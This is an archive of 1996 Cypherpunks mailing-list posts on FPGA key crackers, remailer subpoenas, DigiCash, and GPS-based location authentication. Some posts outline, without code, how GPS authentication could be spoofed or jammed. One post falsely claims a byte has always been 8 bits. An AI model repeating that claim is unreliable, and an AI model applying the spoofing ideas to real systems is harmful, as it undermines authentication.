Also, in most cases some of the necesary tools are only available from the
company that sells the chips.  They tend to insist on nondisclosure
agreements and software licenses, which makes anonymous production tricky.

More design effort will give better price/performance.  The appeal of the
Orca and similar chips is that they can be reprogrammed, but still have the
inherent parallelism of gates in silicon.

I expect that in 5 or 10 years, PC's will come with reprogrammable logic
chips and software that takes advantage of it.  At present it really
takes a trained engineer to use these things.  That's just enough difficulty
that people might feel secure, without actually being secure at all.

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 14 Apr 1996 06:21:36 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] Re: They're running scared.
In-Reply-To: <2.2.32.19960409202520.0093ba00@mail.teleport.com>
Message-ID: <9604100610.AA0414@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Alan Olsen <alano@teleport.com> writes:

  > The question is if they are truly random bombings and how do we
  > determine if they are.  

With a *noise* sphere, of course!

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: etu2@cegep-sept-iles.qc.ca
Date: Thu, 11 Apr 1996 01:41:30 +0800
To: "Anton Rager" <cypherpunks@toad.com
Subject: RE: NSA Budget - NOT!
Message-ID: <199604100731.DAA12937@mail.quebectel.com>
MIME-Version: 1.0
Content-Type: text/plain


cool||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||||!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!At 10:04 09/04/1996 -0700, Anton Rager wrote:
>Wouldn't it be great if it were true!!!!!!! -- sorry folks -- doesn't seem to
>exist
>
>1. - No domain of dod.gov -- there is info for nsa.gov...just not dod.gov
>2. - No valid URL of http://nsa.dod.gov/~reports/quarterly.txt -- no page
>returned
>
>
>This must be a joke....I was gullible enough to try anyway.
>
>
>____________ Original Message Follows _____________________________________
>
>
>   Yes, there are annual and quarterly reports released to the
>   public which describe in meticulous detail expenditures for
>   the agency's program, personnel and equipment:
>
>   1. The program of services and information supplied to
>      government and other intelligence organizations, US and
>      foreign, with terms of each client contract.
>
>   2. US employees, their organization, skills, duties and
>      longevity of service; their names, ranks, identification
>      codes, secure communication methods and home addresses;
>      the location of workplaces; the continued training each
>      is scheduled to receive; leaves of absence and
>      destinations while absent.
>
>   3. Foreign nationals covertly employed worldwide, with
>      information on each as per 2.
>
>   4. A comprehensive listing of all types of world-wide
>      equipment operated; its detailed design, function and
>      output; where it is located; its designers,
>      manufacturers and purchase cost; its schedule of
>      amortization; and its schedule for replacement and/or
>      upgrade, with fifteen-year projected procurement.
>
>   5. Special short- and long-term contracts with governmental
>      and non-governmental organizations, US and foreign for
>      one-time projects, by goal, personnel and equipment.
>
>   6. Special projects with other US and foreign counter-
>      intelligence to issue disinformation about the agency.
>
>   7. Special section on world-wide US and foreign cryptology:
>      cryptanalysis, cryptography, steganography, codes,
>      cyphers, glyphs, mimes; each ranked for security and
>      ease of cracking; governmental and non-governmental
>      parties using each; names of cooperative and resistant
>      cryptographers and cooperating pseudo-cryptographers.
>
>   8. Sub-section on methods of Internet traffic and language
>      analysis; operation and surveillance of anonymous
>      remailers, bulletin boards and mail lists; lists of
>      cooperative and resistant educational institutions and
>      commercial organizations.
>
>   9. Appendices on: black operations; transparent operations;
>      methods for managing cooperative and resistant
>      governmental and non-governmental persons.
>
>   The public is invited to study and/or download these
>   reports anonymously at:
>
>      http://nsa.dod.gov/~reports/quarterly.txt
>
>
>
>
>
>
A la prochaine, Gilles





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@acm.org>
Date: Sun, 14 Apr 1996 13:46:39 +0800
To: cypherpunks@toad.com
Subject: Re: Scientologists may subpoena anonymous remailer records
Message-ID: <2.2.16.19960410092151.2fef491c@tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


The complete deposition may be found in RealAudio format at
http://www.northcoast.com/~grady/depo

At 07:02 PM 4/9/96 -0700, John Gilmore wrote:
>I thought that most or all of the cypherpunk anonymous remailers don't
>keep records.  Not even on backup tapes.  The whole idea is that there
>aren't logs.  But maybe they have found some remailers that are
>non-cypherpunk.  And I haven't verified the truth of what's in the msg
>below.  If anyone hears anything, please let me (or eff@eff.org) know.
>
>	John Gilmore
>
>Date: Tue, 9 Apr 1996 18:27:02 -0700
>To: fight-censorship+@andrew.cmu.edu, eric@remailer.net,
>        farber@cis.upenn.edu (Dave Farber)
>From: jwarren@well.com (Jim Warren)
>Subject: (fwd fyi - NOT verified!!)  very urgent news
>
>Seems like it's just a tad overbroad, if true.  Another example of, "all
>the 'justice' that one can buy"?
>
>--jim
>
>>Date: Tue, 9 Apr 1996 15:44:52 -0700 (PDT)
>>From: shelley thomson <sthomson@netcom.com>
>>Subject: very urgent news
>>To: jwarren@well.com
>>
>>Hello, Jim Warren:
>>
>>        The church of scientology plans to subpoena the records of every
>>anonymous remailer in the USA.
>>
>>        I publish a news/black humor magazine on the net called **Biased
>>Journalism**.  As a journalist I have covered the collision between the
>>church of scientology and the net.  My last three issues have focused on
>>legal action by the church against Grady Ward and Keith Henson.
>>
>>        Today I had a note from Grady Ward, whose deposition was finished
>>today.  He said that they asked him a lot of questions about me, and
>>warned me that they may issue a subpoena for me and a demand for my
>>email.
>>
>>        The church presumably intends to claim that I am not a real
>>journalist because I only publish on the net.  I need to prepare a legal
>>defense, and needless to say, can't afford a lawyer.  If you can direct
>>me to any resources, I would appreciate it very much.
>>
>>        On the basis of events today, Ward believes the church will
>>issue subpoenas for the records of every anonymous remailer in the USA.
>>
>>        If these records are delivered to the church, our First Amendment
>>rights go with them.
>>
>>        Shelley Thomson
>>
>>        publisher, **Biased Journalism**
>>        800-731-0717 voice message
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sun, 14 Apr 1996 02:44:50 +0800
To: die@die.com
Subject: Re: Bank transactions on Internet
Message-ID: <v01540b00ad917ec02a02@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


On FPGAs:

>        And it is rather unlikely that one could make a high clock speed
>high performance hardware based key cracker work without traditional
>high speed logic debugging tools such as a fast logic analyzer (if we
>are talking 5-10 ns clock especially) and a 1 ghz or so digital scope.
>These kinds of gear, though sometimes available after hours to engineers
>working for more liberal companies or schools, cost many thousands
>of dollars and are not garden variety items available to any hacker.

Probably not necessary. Simulators do just fine. And the FPGAs themselves
top out at 50 to 80 MHz.

>        And finally, depending on the technology of the part being
>used, there may be a significant cost in the order of at least hundreds
>if not thousands of dollars for a specialized programmer capable of
>programming ("burning") the FPGA with the interconnect patterns generated
>by the software.  These tend to either be specialized to one kind of
>part and maybe modestly cheap (hundreds of dollars) or universal and
>several thousands of dollars (such as DataIO gear).

Easy to access. They are everywhere. The EPROMs are about $6 each and are
serial. You could build a programmer at home.

>        And at least in my experiance (I may be unusually stupid and
>careless and clumsy or may not be) even if the parts are a few times
>reprogrammable (as CMOS FPGAs often are these days) one can assume
>that one will fry, or break the pins off, or reprogram one time too
>many the FPGA or FPGA's before one gets the design working.  This
>means that it would be realistic to assume several parts would be
>consumed by the prototyping effort, they may not be cheap and this
>adds up too.

While there are OTP FPGAs out there (typocally Altera), many are in-circuit
programmable *any* number of times since they use SRAM internally  not
EPROM cells to program the configuration. The latest twist on FPGAs is to
add more RAM internally and have them reprogram themselves on the fly,
hundreds of thousands of times a second. This cuts the logic requirements
down for desidhns that don't need all of the logic all of the time.

>        So whilst someone working with these parts as part of their job
>or schooling might well have access to all the required resources on an
>informal basis and be able to build a key cracker in evenings or
>weekends for little more than the cost of the chip and a PC board to
>hold it, it should be realistically noted that the actual cost of
>equiping a lab from scratch with the required resources is more on the
>order of tens to hundreds of thousands of dollars rather than $400.

True, but $400 is probably not far low.

>        I must hasten to add that high density FPGAs have many many
>legitimate uses in prototyping logic and producing products in small
>volumes too small to justify the tooling costs of doing mask programmed
>gate arrays (which tend to be significantly faster and easier to design,
>but cost $5-100K NRE to set up custom masks for fabrication). The
>current generation of them make it possible to build logic systems in
>one small chip that a few years ago would have been large  PC boards
>full of PALs and other logic.

My employer uses FPGAs in all new designs for production. They are *very*
common for products that sell into the thousands per year. Mask-programmed
gate arrays have the major disadvantage of very long lead times, usually a
more pressing requirement than saving $30 per board over several thousand
boards.

Companies now make boards that contain just FPGAs wired in a grid. They are
sold as general-purpose logic engines with software to implement circuits
as hardware simulations. I'm sure that these would do just fine, though
they are costly.


-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 11 Apr 1996 05:31:41 +0800
To: cypherpunks@toad.com
Subject: Re: Tense visions of future imperfect
Message-ID: <199604101433.HAA16637@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: frantz@netcom.com (Bill Frantz)
> >[Description of dcash counterfeiting scam, presumably done by stealing
> > the bank's public key]
> I don't see how this third scam would work in a system such as DigiCash
> which uses online clearing.  Unissued serial numbers would be refused when
> presented for clearing.

DigiCash banks do not issue serial numbers.  Serial numbers are randomly
chosen by the user when he withdraws his cash. He blinds the serial
number before presenting the cash to be signed by the bank during
withdrawal.  So the bank never sees serial numbers until they are spent.
The uniqueness of serial numbers results solely from having a large
enough random space that matches are unlikely.

What the bank does is keep a list of all spent serial numbers, not all
issued ones (since it doesn't know those).  That way it can detect double
spending.

We have had some discussions here about how banks could recognize this
kind of counterfeiting, similar to the statistical measures mentioned in
Garfinkel's scenario, and steps that could be taken.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 14 Apr 1996 11:05:04 +0800
To: gnu@toad.com (John Gilmore)
Subject: Re: Scientologists may subpoena anonymous remailer records
In-Reply-To: <199604100202.TAA16568@toad.com>
Message-ID: <199604101236.HAA26752@homeport.org>
MIME-Version: 1.0
Content-Type: text


John Gilmore wrote:

| I thought that most or all of the cypherpunk anonymous remailers don't
| keep records.  Not even on backup tapes.  The whole idea is that there
| aren't logs.  But maybe they have found some remailers that are
| non-cypherpunk.  And I haven't verified the truth of what's in the msg
| below.  If anyone hears anything, please let me (or eff@eff.org) know.
| 
| 	John Gilmore

	Does that prevent a subpeona as a form of harrassment?  There
are already reliability problems in the remailer network.  (Witness
the anon messages that get received twice, as insurance that it gets
through.)  Making the remailers less reliable is in the intrests of
the bad guys.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 11 Apr 1996 03:39:40 +0800
To: Sten Drescher <stend@grendel.texas.net>
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't   Work
In-Reply-To: <199604090654.XAA16860@dns2.noc.best.net>
Message-ID: <316BB329.1E57@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Sten Drescher wrote:
> MM> There are supposedly some new techniques that look at the infrared
> MM> signature of your face 
> 
>         So if I'm running a fever, or just been exercising, it
> wouldn't recognize me, right?  Doesn't sound like that would be much
> better.

But it could be that it looks for patterns of where the hot & cold zones
are, and since exercise doesn't rearrange the concentrations of blood
vessels beneath your skin, the matching might still be possible.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 11 Apr 1996 03:00:38 +0800
To: cypherpunks@toad.com
Subject: Re: onyma
Message-ID: <v02120d08ad9150c3c1ee@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:05 PM 4/9/96, Name Withheld by Request wrote:


> The term `nym' is erroneus: The Greek words are an-onym, pseud-onym,
> syn-onym, hom-onym pp, derived from `onyma', name.

Ah. I get it. Like Bass-omatic...

<Siddown, Bob!>

But, but, wasn't Bass-o-matic crypto, once?

Cheers,
Bob

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
-------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 11 Apr 1996 03:34:22 +0800
To: Steven Weller <stevenw@best.com>
Subject: Re: RISKS: Social Security (sic) Administration fraud
In-Reply-To: <v01540b00ad90ceb34f24@[206.86.1.35]>
Message-ID: <316BB624.5813@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Steven Weller quotes Sean Reifschneider:
>                        ... Apparently several employees of the Social
> Security Administration sold information including  SSNs and mother's
> maiden names of more than 11,000 people to a credit-card fraud ring.

But nothing like that would ever happen at a Federal key escrow agency.
No way.  Inconceivable.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 11 Apr 1996 02:59:11 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
In-Reply-To: <199604091750.TAA13469@utopia.hacktic.nl>
Message-ID: <199604101241.IAA04877@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> 
> Location-based System Delivers User
> Authentication Breakthrough
> 
> By Dorothy E. Denning and Peter F. MacDoran
> Copyright(c), 1996 - Computer Security Institute - All Rights Reserved
> Top - Help
> 

A bunch of us heard about this a while back, and I was in on an
exchange between several people including Phil Karn and Dorothy
Denning. The gist of it is that Denning et al believe they have
something -- and they are smart people -- but all the smart people who
understand both GPS and crypto think its total bunk and not at all
hard to fake being anywhere at all. I would say that I go with the
latter.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 02:52:47 +0800
To: Bill Stewart <thecrow@iconn.net>
Subject: Re: questions about bits and bytes
Message-ID: <m0u736N-0008yBC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 AM 4/10/96 -0700, Bill Stewart wrote:
>At 09:33 PM 4/8/96 -0400, Jack Mott wrote:
>>This may be a bit of a no brainer, but everything I have read sorta 
>>skips over this point.  a bit is 1 or 0.  8 bits make up a byte (0-255).
>
>Be careful writing code - sometimes a byte is -128 to 127 instead of 0 to 255.
>Also, there are machines (mostly old kinky ones) that use bytes of sizes
>other than 8 bits.

No, Bill, a "byte" has ALWAYS been 8-bits.  One of the main reasons 
the term "byte" was invented was because the term "word" (as in, "word 
length") varied for different computers, especially in the 1960's. (In fact, 
many computers of that era used word lengths other than 8, 16, 32, 64 bits, 
as surprising as this may sound to the current crop of PC and Mac 
afficionados.)  This made it inconvenient to talk about memory capacities 
unless you were referring to the same machine.  The solution was to invent a 
new term, "byte," which conviently had about the same size as an ASCII 
character and was always 8 bits.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 11 Apr 1996 06:26:41 +0800
To: pcw@access.digex.net
Subject: Re: No matter where you go, there they are.
Message-ID: <199604101553.IAA20688@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter - didn't they say that the checking station is also listening
to the satellites?  That way they can tell that you are playing back
signals that you taped earlier because they won't match what the
satellites are broadcasting right now.

I think your idea would work if you wanted to pretend to be at a point
which was _farther_ from each of the satellites than where you actually
are.  Then you could delay all of the signals.  But the only way to
be farther would be to be deep underground.  You might be able to pretend
to be at the center of the earth, but that is not very useful.

Actually I suppose this only applies to those satellites which are shared
between you and the checkin station.  If you are far away then maybe you
only share one or two.  If you know which ones those are, you can lie to
your heart's content about other ones, and for the shared ones you can
again delay the signal and claim to be farther than you are.

If their authenticated repeaters are used then you have to assume the
checking station has all the satellite signals and again the best you can
do is pretend to be a Mole Man.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kim Johansson <jkim@sn.no>
Date: Sun, 14 Apr 1996 06:33:41 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscrive
Message-ID: <199604100656.IAA25040@ekeberg.sn.no>
MIME-Version: 1.0
Content-Type: text/plain


At 09:18 09.04.96 +0000, Brad Shantz wrote:
>Time May Wrote:
>
>>Maybe these dweebs are posting from an alternate universe? A universe in
>>which not even messages explaining that "unsubscrive," "unsuscribe,"
>>"undescribe," "unscribe," and "unimbibe" are not valid alternate spellings
>>of "unsubscribe."
>>
>>I've copied my short explanation of how to subscribe and unsubcribe too
>>many times to do it again; and it is clear that these folks are either
>>doing this out of spite, are not reading any of the messages we send them,
>>or think it funny.
>
>I agree with you to a point, Tim.  They probably haven't read the 
>messages about how to properly unsubscrive.  Not because they are 
>dweebs or because they think it's funny.  they probably haven't read 
>the messages because they have 2 or 3 thousand messages in their 
>inbox and they're all from cpunks.  Unfortunately, this time, I have 
>to give them the benefit of the doubt for being ignorant.  I don't 
>think they're being vindictive.
>
>How many of them have posted Unsub messages after being told the 
>proper way to unsub?
>
>Brad
>
I want off. Please help me.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 06:13:03 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <Pine.SUN.3.91.960409192104.24728B-100000@crl6.crl.com>
Message-ID: <199604101300.JAA04920@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Folks;

Just a small meta-request. I already filter everything Jim writes --
its all junk -- but when people reply to a message of his and send the
mail only to Cypherpunks, it is hard for me to filter the reply. If
people could make sure that he's in the To: line, or could make a
practice of putting some standardized phrase (I suggest the words 
"Jim Bell YaddaYadda") into the Subject: line it would make it easier
to filter.

Some people (especially those who don't try to do it) don't actually
understand how hard it is, technically, to heavily filter out the
noise; in the general case the problem is AI complete. Sigh.

Perry

Sandy Sandfort writes:
> To which Jim Bell wrote:
>  
> > And the rest of us are tired of seeing those non-responses!
> 
> Exactly for whom is Bell speaking?  Jimbo, please let us know 
> who has given you a limited powers of attorney to be their
> mouthpiece.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Thu, 11 Apr 1996 06:16:20 +0800
To: Steve Reid <cypherpunks@toad.com
Subject: The last I'll say on the unsubscribing thing
Message-ID: <199604101611.JAA14641@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm did not say that the people sending the messages to "unsubscrive" 
were justified in what they did.  YES, it is written in the welcome 
message.  I just think that maybe we need to be a little tolerant of 
a few people out of 1200 who made an honest mistake.

I still believe that the people sending the messages haven't read 
Tim's "nth Fucking Time" message.  Or his "Under attack by 
foreigners" message.  Or my response about their lack of ignorance.  
(Tim, I just mentioned your messages because they came to mind.  
**GRIN**)  

Steve, I even think that they didn't read your "unsubscrive list" 
message, which I thought was wonderful.

I just think that instead of complaining to the list they're trying 
to remove themselves from, we should send them mail individually.  
I'm sure that Tim already has. (at least he said he did...i think.)

Since I posted yesterday, I have received a nubmer of messages from 
people interested in removing themselves from Cypherpunks.  I sent 
them the paragraph from the welcome message.  And that was that.

Brad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 10:03:57 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Tense visions of future imperfect
In-Reply-To: <199604091857.LAA06933@netcom9.netcom.com>
Message-ID: <199604101321.JAA04966@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> >   Garfinkel described it like this:
[...]
> >   "This counterfeit currency looked just like the real thing,
> >   except it was a fraud. She even found some of it -- a
> >   digital dollar that was signed and sealed by the US
> >   government's secret key, yet had a serial number that had
> >   never been issued. The money that was being made was on the
> >   Net. It was everywhere and nowhere. And it was encrypted,
> >   so that we wouldn't even know it if we found it. Last
> >   month, we estimate, the total fraud was up to $900,000 a
> >   month, and it is increasing still."
> 
> I don't see how this third scam would work in a system such as DigiCash
> which uses online clearing.  Unissued serial numbers would be refused when
> presented for clearing.

The whole point of DigiCash is that its blind to the issuing bank; it
doesn't know any serial numbers. However, Garfinkel's journalism is
faulty, because the bank would never see "unissued serial numbers" in
a system like DigiCash.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean.Chouanard@grenoble.rxrc.xerox.com (Jean Chouanard)
Date: Sun, 14 Apr 1996 10:09:44 +0800
To: cypherpunks@toad.com
Subject: US crypto laws? Need help!
Message-ID: <v02140b18ad91143a0d5e@[13.202.222.150]>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

I was wondering if a foreigner like, with a valid work visa but not a
permanet green card, is allowed to use crypto in the state.

If yes, is there any restriction? Depending on crypto methods?

Thank a lot, Jean

---
let's all be different, just like me.
---
    Jean Chouanard                   | Jean.Chouanard@Grenoble.RXRC.Xerox.com
Networks & Systems Eng.              |        Rank Xerox Research Centre
 Fax: (33) 76 61 51 99               |           6, Ch de maupertuis
 Ph:  (33) 76 61 50 90               |           38240 Meylan FRANCE






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Apr 1996 05:53:33 +0800
To: perry@piermont.com
Subject: Protocols at the Point of a Gun
Message-ID: <2.2.32.19960410134837.0075cc14@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:38 PM 4/9/96 -0400, Perry E. Metzger wrote:

>The internet and the culture are coming into conflict in a big way,
>and I don't believe that both of them can survive.
>
>Perry

Well this is as good a time and place as any to ask the question that
none of the opposition seems to have asked (perhaps because they don't
know enough to ask):  How do you force geographically dispersed nodes
on a distributed network to adopt a set of officially mandated protocols?

But first a reading assignment:  "How Anarchy Works--Inside the Internet
Engineering Task Force" from Wired.

http://www.hotwired.com/wired/3.10/departments/electrosphere/ietf.html

So, now we know that the IETF has been pretty successful as a means
of standards setting.  We then have to go on to discuss how The Great
Enemy might undertake to intervene in this process.  

Questions:

1)  Are there any official agencies currently involved in drafting 
substitute protocols?

2) Do the public employees on the IETF behave any differently from the
private employees?

3)  Do the world's governments have the programming talent?
 
4)  Do the world's governments have a way to get users at all levels
to adopt their protocols?

I don't know the answer to these questions.

We know that governments would like to impose things like the Simple
Tax Transfer Protocol on the Net as well as Is A Person (and Is A Minor)
Protocols.  The Heathen Chinee have proposed their own entry into the
protocol design process as have many of the other governments.  Do
they have any idea yet how to go about it?  Do we?

DCF


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWu7OYVO4r4sgSPhAQFw8wP/SONzr+vOKaIw3NQPTF4o1xk4hVFrlWEs
y5fLcrh2jHlejPMvdoTNJIvZ0nsgLNJU8QsW+goRzl9B37/8U9oG8A0CgvOu9Wr9
2aP+zkHjTYldvtGuOWXNoq7tdQDGY5cGzMTJZO0WRwMBhpO+BnOGPPN2MqxMOPIK
vbIgly4DEI8=
=57wn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 11 Apr 1996 13:01:42 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: onyma
In-Reply-To: <199604100105.DAA09113@utopia.hacktic.nl>
Message-ID: <to+ax8m9LM7U085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199604100105.DAA09113@utopia.hacktic.nl>,
nobody@replay.com (Name Withheld by Request) wrote:
> tcmay@got.net (Timothy C. May) writes:
> 
> >Not meant to be snide, even if sounded that way. I just get confused by
> >your various nyms
> 
> The term `nym' is erroneus: The Greek words are an-onym, pseud-onym,
> syn-onym, hom-onym pp, derived from `onyma', name.
> 

I am a professional freelance editor and copyeditor.  It is my job to
see that the language used by authors conforms to the rigid dictates of
style, spelling, and grammar.

As an experienced professional in this field, I have learned that where
rules of spelling, grammar, vocabulary come from is *usage*.  Words
become accepted parts of the language because people start to use them. 
The acceptance of words is recognized by their adoption in to lexicons
and dictionaries, but this is description, not prescription.

If you want to be linguistically correct and ensure that 'onyma'
prevails over 'nym,' you've got a lot of catching up to do.  'Nym' is
is clearly established by usage on the Cypherpunks list, and I expect
it's only a matter of time before it starts showing up in print media,
if it hasn't already, and get listings in the Jargon File, then
dictionaries, etc.

You can't fight usage; it is usage that makes the language as she is
spoke what it is.


- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMWvs5uVevBgtmhnpAQER0wMAwwaSOvUPKrC1p4WbMuWtJAeeYx5V2Wuv
weaRhr0bhbQ70y4IZ+ZkBGN4YcLfVSUV9MZCylEJcoASEzeJL3rV42H02j3+HIjl
v6v82ylpCLZBpGWyKfHrF7/zYRjCgUiZ
=362B
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Thu, 11 Apr 1996 04:44:51 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <v02140b09ad916e6d8a17@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Hmm. Here's an interesting question.  Let's say that there are 3
satellites in view broadcasting signals f1(t), f2(t) and f3(t).
The way the system triangulates is to compute the distance from
a location to a satellite by timing the arrival of a signal. So
if signal f2(t) arrives at t+3 milliseconds, then the receiver
is 3 lightmilliseconds away from satellite 2.

For sake of simplicity, let the coordinates be expressed in
distance from the satellites. (2,3,1) would mean a distance of
2, 3 and 1 light milliseconds from satellites 1,2 and 3
respectively.

Okay, so why can't I just tape the signals I get from each of
the three satellites. Let these be T1(t), T2(t) and T3(t).
Assume we can easily synchronize them so that T1(t-o1)=f1(t).
That is, we figure out our coordinates (o1,o2,o3), and subtract
the offset from each tape.

Then if we want to pretend to be at coordinate (a1,a2,a3), we
simply say that we just received values T1(t-o1+a1),
T2(t-o2+a2), T3(t-o3+a3).

Or course, I could be completely missing some neat feature of
DGPS. I really don't know the details of how it works and this
could be completely wrong. Any thoughts?

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 11 Apr 1996 08:28:58 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <m0u74QI-0008yEC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:41 AM 4/10/96 -0400, Perry E. Metzger wrote:
>
>Anonymous writes:
>> 
>> Location-based System Delivers User
>> Authentication Breakthrough
>> 
>> By Dorothy E. Denning and Peter F. MacDoran
>> Copyright(c), 1996 - Computer Security Institute - All Rights Reserved
>> Top - Help
>> 
>
>A bunch of us heard about this a while back, and I was in on an
>exchange between several people including Phil Karn and Dorothy
>Denning. The gist of it is that Denning et al believe they have
>something -- and they are smart people -- but all the smart people who
>understand both GPS and crypto think its total bunk and not at all
>hard to fake being anywhere at all. I would say that I go with the
>latter.

The latter is far closer to the truth.  First off, GPS signals can be faked. 
 In fact, there are commercial boxes sold that generate a full synthetic 
constellation of GPS signals; these boxes are usually intended to simulate 
motion of a vehicle when the GPS unit under test is actually stuck in a 
laboratory or factory floor.  If such a box were connected to an amplifier 
of a few tens or hundreds of milliwatts, it would be possible to park near a 
potential target and deny him service by making it look like his signal came 
from anywhere else around the world.  (Military boxes would detect this 
because of A/S, however.)  

And if you had a receiver at some specific location at 
which you intend to appear to be connected at, it is likely that full data 
describing the motions of the satellites could be supplied to any other 
location on the Internet needing well under 14,400 bps.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Apr 1996 06:20:47 +0800
To: cypherpunks@toad.com
Subject: Re: Open Systems, Closed Systems, & Killer Apps
Message-ID: <2.2.32.19960410141442.00766f04@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Various correspondents have pointed out that X.25 is an "open system" in
that it is not proprietary.  I knew that.  I was thinking more of
hierarchical vs peer-to-peer.  I have been under the impression that
TCP/IP connections are more peer-to-peer between different sorts of
networks (or nodes) than X.25.  Isn't X.25 more of a standard for a
